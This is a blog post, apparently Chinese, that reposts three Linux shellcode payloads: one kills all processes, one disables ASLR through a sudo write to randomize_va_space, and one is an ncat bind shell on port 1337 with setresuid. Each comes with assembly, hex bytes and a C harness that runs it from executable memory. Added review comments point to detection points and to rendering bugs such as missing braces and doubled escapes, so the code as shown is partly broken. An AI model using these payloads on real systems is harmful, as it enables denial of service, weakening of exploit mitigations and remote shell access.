[shellcode分享]Linux/x86 - 杀死所有进程 Shellcode(14 字节)
免责声明:
本POC程序仅供安全研究与教学之用,使用者将其信息做其他用途,由使用者承担全部法律及连带责任,CSDN博客平台及博主鸿渐之翼不承担任何法律及连带责任。
Linux/x86 - Kill All Processes Shellcode (14 bytes)
# Exploit Title: Linux/x86 - Kill All Processes Shellcode (14 bytes)
# Google Dork: None
# Date: 2018-12-08
# Exploit Author: strider
# Vendor Homepage: None
# Software Link: None
# Tested on: Debian 9 Stretch i386/ Kali Linux i386
# CVE : None
# Shellcode Length: 14
# Description: Linux/x86 kill 9 -1 (14 bytes)
------------------------------[Description]---------------------------------
This shellcode will kill all processes
-----------------------------[Shellcode Dump]---------------------------------
08048060 <_start>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: b0 25 mov $0x25,%al
8048065: bb ff ff ff ff mov $0xffffffff,%ebx
804806a: b1 09 mov $0x9,%cl
804806c: cd 80 int $0x80
-----------------------------[Compile]---------------------------------------------
gcc -m32 -fno-stack-protector -z execstack -o tester tester.c
-----------------------------[C-Code]-----------------------------
#include<stdio.h>
#include<string.h>
unsigned char code[] = "\\x31\\xc0\\x50\\xb0\\x25\\xbb\\xff\\xff\\xff\\xff\\xb1\\x09\\xcd\\x80";
/* Test harness: prints the payload length, then jumps into the byte array.
 * NOTE(review): the braces of main() are missing in this rendering, and
 * `main()` with no return type is implicit int, which is invalid since C99. */
main()
/* strlen() returns size_t; printing it with "%d" is a type mismatch (UB) --
 * "%zu" is the matching conversion. */
printf("Shellcode Length: %d\\n", strlen(code));
/* Calling into a data array only works because the build line above passes
 * -z execstack, i.e. asks the loader to drop NX; with a default W^X toolchain
 * this cast-and-call faults, which is precisely the mitigation that defeats
 * this class of payload. */
int (*ret)() = (int(*)())code;
ret();
Linux/x64 - 禁用 ASLR 安全 Shellcode(93 字节)
Linux/x64 - Disable ASLR Security Shellcode (93 Bytes)
/*
ASLR (Address Space Layout Randomization) Disable Shellcode Language C & ASM - Linux/x86_64
Author : Kağan Çapar
contact: kagancapar@gmail.com
shellcode len : 93 bytes
compilation: gcc -fno-stack-protector -z execstack [.c] -o []
Test:
run shellcode (./aslr etc.)
check : cat /proc/sys/kernel/randomize_va_space
you will see "0"
Assembly:
global _start
section .ASLR
_start:
#6A3B push byte +0x3b
#58 pop eax
#99 cdq
#48 dec eax
#BB2F62696E mov ebx,0x6e69622f
#2F das
#7368 jnc 0x75
#005348 add [ebx+0x48],dl
#89E7 mov edi,esp
#682D630000 push dword 0x632d
#48 dec eax
#89E6 mov esi,esp
#52 push edx
#E836000000 call 0x56
#6563686F arpl [gs:eax+0x6f],bp
#2030 and [eax],dh
#207C2073 and [eax+0x73],bh
#7564 jnz 0x90
#6F outsd
#20746565 and [ebp+0x65],dh
#202F and [edi],ch
#7072 jo 0xa7
#6F outsd
#632F arpl [edi],bp
#7379 jnc 0xb3
#732F jnc 0x6b
#6B65726E imul esp,[ebp+0x72],byte +0x6e
#656C gs insb
#2F das
#7261 jc 0xa6
#6E outsb
#646F fs outsd
#6D insd
#697A655F76615F imul edi,[edx+0x65],dword 0x5f61765f
#7370 jnc 0xc2
#61 popa
#636500 arpl [ebp+0x0],sp
#56 push esi
#57 push edi
#48 dec eax
#89E6 mov esi,esp
#0F05 syscall
*/
#include <stdio.h>
#include <string.h>
/* 93-byte Linux/x86_64 payload. Read the byte column of the listing above
 * rather than its mnemonics: it is a 32-bit disassembly of 64-bit code (the
 * 0x48 REX prefixes show up as `dec eax`). The bytes are execve(2) (0x3b) of
 * "/bin/sh" with argv = { "/bin/sh", "-c", <cmd> }, where <cmd> is the text
 * at 0x65 0x63 0x68 0x6f ...: "echo 0 | sudo tee /proc/sys/kernel/randomize_va_space".
 * Nothing here escalates privilege by itself -- the sysctl write succeeds only
 * if the executing user can already sudo -- so an audit rule on writes to
 * randomize_va_space, or a read-back of that file (see Test above), is the
 * relevant detector.
 * The sequence embeds 0x00 bytes ("/bin/sh" is terminated at offset 13), so
 * it is not NUL-free and strlen() on it stops early.
 * NOTE(review): escapes are rendered "\\x.." (doubled backslash) throughout
 * and the line continuation after `=` as "\\" -- page artifacts, not C. */
unsigned char ASLR[] = \\
"\\x6a\\x3b\\x58\\x99\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x00\\x53"
"\\x48\\x89\\xe7\\x68\\x2d\\x63\\x00\\x00\\x48\\x89\\xe6\\x52\\xe8\\x36\\x00"
"\\x00\\x00\\x65\\x63\\x68\\x6f\\x20\\x30\\x20\\x7c\\x20\\x73\\x75\\x64\\x6f"
"\\x20\\x74\\x65\\x65\\x20\\x2f\\x70\\x72\\x6f\\x63\\x2f\\x73\\x79\\x73\\x2f"
"\\x6b\\x65\\x72\\x6e\\x65\\x6c\\x2f\\x72\\x61\\x6e\\x64\\x6f\\x6d\\x69\\x7a"
"\\x65\\x5f\\x76\\x61\\x5f\\x73\\x70\\x61\\x63\\x65\\x00\\x56\\x57\\x48\\x89"
"\\xe6\\x0f\\x05";
/* Test harness: print the payload length, then call the byte array directly.
 * NOTE(review): the braces of main() are missing in this rendering. */
int main()
/* "%d" with a size_t argument is UB -- "%zu" is the matching conversion.
 * Also, the ASLR bytes above contain 0x00 at offset 13 (the terminator of
 * "/bin/sh"), so strlen() reports 13 here, not the 93 bytes the header
 * comment documents. */
printf("Shellcode len: %d\\n", strlen(ASLR));
/* Works only with the -z execstack build line from the header, i.e. with NX
 * dropped; a W^X toolchain makes this call fault, which is the mitigation. */
int (*ret)() = (int(*)())ASLR;
ret();
Linux/x86 - execve(/usr/bin/ncat -lvp 1337 -e /bin/bash)+Null-Free Shellcode (95 bytes)
/*
Linux/x86-execve(/usr/bin/ncat -lvp 1337 -e/bin/bash)+NULL-FREE Shellcode(95 bytes)
Author : T3jv1l
Contact: t3jv1l@gmail.com
Twitter:https://twitter.com/T3jv1l
Shellcode len : 119 bytes
Compilation: gcc shellcode.c -o shellcode
Compilation on an x64 host: gcc -m32 shellcode.c -o shellcode
Tested On: Ubuntu 16.04.5 LTS
Arch: x86
Size: 95 bytes
Thanks for helping NytroRST
############################################################################
global _start:
_start:
jmp short todo
shellcode:
xor eax, eax ;Zero out eax
xor ebx, ebx ;Zero out ebx
xor ecx, ecx ;Zero out ecx
cdq ;Zero out edx using the sign bit from eax
mov BYTE al, 0xa4 ;Setresuid syscall 164 (0xa4)
int 0x80 ;Syscall execute
pop esi ;esi now holds the address of the string defined with db
xor eax, eax ;Zero out eax
mov[esi+13], al ;Null terminate /usr/bin/ncat
mov[esi+22], al ;Null terminate -lvp1337
mov[esi+34], al ;Null terminate -e/bin/bash
mov[esi+35], esi ;Store address of /usr/bin/ncat in AAAA
lea ebx, [esi+14] ;Load address of -lvp1337
mov[esi+39], ebx ;Store address of -lvp1337 in BBBB taken from ebx
lea ebx, [esi+23] ;Load address of -e/bin/bash into ebx
mov[esi+43], ebx ;Store address of -e/bin/bash in CCCC taken from ebx
mov[esi+47], eax ;Zero out DDDD
mov al, 11 ;11 is execve syscall number
mov ebx, esi ;Store address of /usr/bin/ncat
lea ecx, [esi+35] ;Load address of ptr to argv[] array
lea edx, [esi+47] ;envp[] NULL
int 0x80 ;Syscall execute
todo:
call shellcode
db '/usr/bin/ncat#-lvp1337#-e/bin/bash#AAAABBBBCCCCDDDD'
; 012345678901234567890123456789012345678901234567890
######################################################################################
ncat.o: file format elf32-i386
Disassembly of section .text:
00000000 <_start>:
0: eb 35 jmp 37 <todo>
00000002 <shellcode>:
2: 31 c0 xor %eax,%eax
4: 31 db xor %ebx,%ebx
6: 31 c9 xor %ecx,%ecx
8: 99 cltd
9: b0 a4 mov $0xa4,%al
b: cd 80 int $0x80
d: 5e pop %esi
e: 31 c0 xor %eax,%eax
10: 88 46 0d mov %al,0xd(%esi)
13: 88 46 16 mov %al,0x16(%esi)
16: 88 46 22 mov %al,0x22(%esi)
19: 89 76 23 mov %esi,0x23(%esi)
1c: 8d 5e 0e lea 0xe(%esi),%ebx
1f: 89 5e 27 mov %ebx,0x27(%esi)
22: 8d 5e 17 lea 0x17(%esi),%ebx
25: 89 5e 2b mov %ebx,0x2b(%esi)
28: 89 46 2f mov %eax,0x2f(%esi)
2b: b0 0b mov $0xb,%al
2d: 89 f3 mov %esi,%ebx
2f: 8d 4e 23 lea 0x23(%esi),%ecx
32: 8d 56 2f lea 0x2f(%esi),%edx
35: cd 80 int $0x80
00000037 <todo>:
37: e8 c6 ff ff ff call 2 <shellcode>
3c: 2f das
3d: 75 73 jne b2 <todo+0x7b>
3f: 72 2f jb 70 <todo+0x39>
41: 62 69 6e bound %ebp,0x6e(%ecx)
44: 2f das
45: 6e outsb %ds:(%esi),(%dx)
46: 63 61 74 arpl %sp,0x74(%ecx)
49: 23 2d 6c 76 70 31 and 0x3170766c,%ebp
4f: 33 33 xor (%ebx),%esi
51: 37 aaa
52: 23 2d 65 2f 62 69 and 0x69622f65,%ebp
58: 6e outsb %ds:(%esi),(%dx)
59: 2f das
5a: 62 61 73 bound %esp,0x73(%ecx)
5d: 68 23 41 41 41 push $0x41414123
62: 41 inc %ecx
63: 42 inc %edx
64: 42 inc %edx
65: 42 inc %edx
66: 42 inc %edx
67: 43 inc %ebx
68: 43 inc %ebx
69: 43 inc %ebx
6a: 43 inc %ebx
6b: 44 inc %esp
6c: 44 inc %esp
6d: 44 inc %esp
6e: 44 inc %esp
###################################################################################
*/
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
/* Function pointer used to jump into the mmap()ed copy of the payload. */
int (*shellcodetotest)();
/* 95-byte Linux/x86 payload, matching the objdump above: setresuid(0,0,0)
 * (0xa4, with ebx/ecx/edx zeroed) followed by execve(2) (0x0b) of
 * "/usr/bin/ncat" with argv { "/usr/bin/ncat", "-lvp1337", "-e/bin/bash" },
 * i.e. a bind shell on TCP/1337 -- a listening ncat with -e is a high-signal
 * detection on its own. The '#' separators are patched to 0x00 at run time
 * (the byte stores at esi+13/22/34), which is what keeps the array NUL-free.
 * The asm's scratch area "AAAABBBBCCCCDDDD" at the end of the `db` line is
 * NOT part of this array: the argv pointer stores at esi+35..esi+50 write
 * past the end of these 95 bytes, into whatever follows the copy in the
 * 150-byte mapping main() allocates.
 * NOTE(review): escapes are rendered "\\x.." (doubled backslash) -- a page
 * artifact; as written these are not byte escapes. */
char shellcode[] = "\\xeb\\x35\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x99\\xb0\\xa4\\xcd\\x80\\x5e\\x31\\xc0\\x88\\x46\\x0d\\x88\\x46\\x16\\x88\\x46\\x22\\x89\\x76\\x23\\x8d\\x5e\\x0e\\x89\\x5e\\x27\\x8d\\x5e\\x17\\x89\\x5e\\x2b\\x89\\x46\\x2f\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x23\\x8d\\x56\\x2f\\xcd\\x80\\xe8\\xc6\\xff\\xff\\xff\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x6e\\x63\\x61\\x74\\x23\\x2d\\x6c\\x76\\x70\\x31\\x33\\x33\\x37\\x23\\x2d\\x65\\x2f\\x62\\x69\\x6e\\x2f\\x62\\x61\\x73\\x68\\x23";
/* Test harness: copy the payload into an anonymous RWX mapping and call it.
 * NOTE(review): the braces of main() and of the if-block are missing in this
 * rendering; argc/argv are unused. */
int main(int argc, char **argv)
/* PROT_EXEC | PROT_WRITE on one mapping is exactly the W^X violation that
 * hardened kernels and policies (SELinux execmem, PaX MPROTECT) refuse; a
 * production build would never map memory this way. The 150 bytes exceed the
 * 96-byte copy below, and the payload's self-patching stores at esi+35..esi+50
 * land in that zero-filled tail -- presumably why 150 was chosen (TODO
 * confirm; the array carries no scratch area of its own). */
void *ptr = mmap(0, 150, PROT_EXEC | PROT_WRITE| PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
if(ptr == MAP_FAILED)
perror("mmap");
/* exit(-1) becomes exit status 255; EXIT_FAILURE is the portable spelling. */
exit(-1);
/* "%d" with a size_t argument is UB -- "%zu" is the matching conversion. */
printf("Shellcode Length: %d\\n", strlen(shellcode));
/* sizeof includes the terminating NUL, so 96 bytes are copied. */
memcpy(ptr, shellcode, sizeof(shellcode));
shellcodetotest = ptr;
shellcodetotest();
return 0;